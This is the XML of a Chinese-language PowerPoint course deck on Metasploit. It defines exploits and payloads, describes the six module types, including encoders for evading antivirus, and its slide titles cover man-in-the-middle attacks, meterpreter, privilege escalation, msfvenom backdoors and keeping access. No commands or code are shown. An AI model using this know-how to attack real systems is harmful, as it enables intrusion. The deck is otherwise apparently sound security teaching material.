              <a:t>Nops)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B6E86A-B6B8-47ED-B268-DC69C5B7D029}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467833" y="4019107"/>
            <a:ext cx="5628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Payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>指攻击成功促使目标运行的一段代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果说</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是火箭，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>就是火箭上的子弹头</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="609496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E2DFA-38AC-4749-B2E8-AD70F77D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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>详解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59F5AE-54D3-4478-B06E-77F4F026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47DB3D-B0A6-41BC-98C5-11ADFD66B9DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="776177" y="1626781"/>
            <a:ext cx="98989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六大模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一、渗透攻击模块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exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>) :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用发现的安全漏洞或配置对远程目标系统进行攻击的代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>       (1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主动渗透模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务端渗透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>        (2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>被动渗透模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>客户端渗透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>二、辅助模块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Aux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实现信息收集口令猜测，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Dos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击等无法直接取得服务器权限的攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>三、攻击载荷模块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Nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>空指令 典型控制令就是空操作，数据缓冲区时 在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>之前添加控制令，这样触发执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>时，有较大安全区着陆，避免受到内存 地址随机化，返回地址计算偏差曹成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>失败</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>四、编码器模块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encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>免杀，逃避 反病毒软件等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>五、攻击载荷模块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payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>指攻击成功促使目标运行的一段代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>六、后渗透模块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post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用于维持访问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233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5c9de48-0f76-44ec-9d4a-88920333c5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heme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="主题5">
  <a:themeElements>
    <a:clrScheme name="0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2176</TotalTime>
  <Words>1240</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>229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Open Sans Semibold</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>主题5</vt:lpstr>
      <vt:lpstr>Metasploit 讲解</vt:lpstr>
      <vt:lpstr>本章内容</vt:lpstr>
      <vt:lpstr>中间人攻击(上节课实验)</vt:lpstr>
      <vt:lpstr>中间人攻击</vt:lpstr>
      <vt:lpstr>中间人攻击实验</vt:lpstr>
      <vt:lpstr>dsniff 结合arp攻击</vt:lpstr>
      <vt:lpstr>Metasploit 目录结构</vt:lpstr>
      <vt:lpstr>Metasploit 讲解</vt:lpstr>
      <vt:lpstr>Metasploit详解</vt:lpstr>
      <vt:lpstr>Metasploit基础使用 </vt:lpstr>
      <vt:lpstr>Metasploit meterpreter</vt:lpstr>
      <vt:lpstr>metasploit 载入插件</vt:lpstr>
      <vt:lpstr>Metasploit command</vt:lpstr>
      <vt:lpstr>Metasploit command</vt:lpstr>
      <vt:lpstr>Metasploit技巧</vt:lpstr>
      <vt:lpstr>巧用help</vt:lpstr>
      <vt:lpstr>Metasploit 信息探测</vt:lpstr>
      <vt:lpstr>Metasploit 信息探测</vt:lpstr>
      <vt:lpstr>Metasploit 信息探测</vt:lpstr>
      <vt:lpstr>实例 Metasploit 扫描</vt:lpstr>
      <vt:lpstr>Metasploit smb version扫描</vt:lpstr>
      <vt:lpstr>Metasploit 其他扫描</vt:lpstr>
      <vt:lpstr>Metasploit 扫描补充</vt:lpstr>
      <vt:lpstr>Metasploit漏洞实战</vt:lpstr>
      <vt:lpstr>meterpreter run post使用</vt:lpstr>
      <vt:lpstr>meterpreter run post使用</vt:lpstr>
      <vt:lpstr>Metasploit windows提权 </vt:lpstr>
      <vt:lpstr>Metasploit linux 提权</vt:lpstr>
      <vt:lpstr>Metasploit msfvenom 使用</vt:lpstr>
      <vt:lpstr>msfvenom 实例</vt:lpstr>
      <vt:lpstr>msfvenom 后门</vt:lpstr>
      <vt:lpstr>Metasploit维持权限</vt:lpstr>
      <vt:lpstr>Metasploit自动化攻击</vt:lpstr>
      <vt:lpstr>metasploit自动攻击实战</vt:lpstr>
      <vt:lpstr>谢谢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 DAI</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <cp:lastPrinted>2017-08-20T16:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-08-20T16:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-19T02:44:17Z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95c9de48-0f76-44ec-9d4a-88920333c593</vt:lpwstr>
  </property>
</Properties>
</file>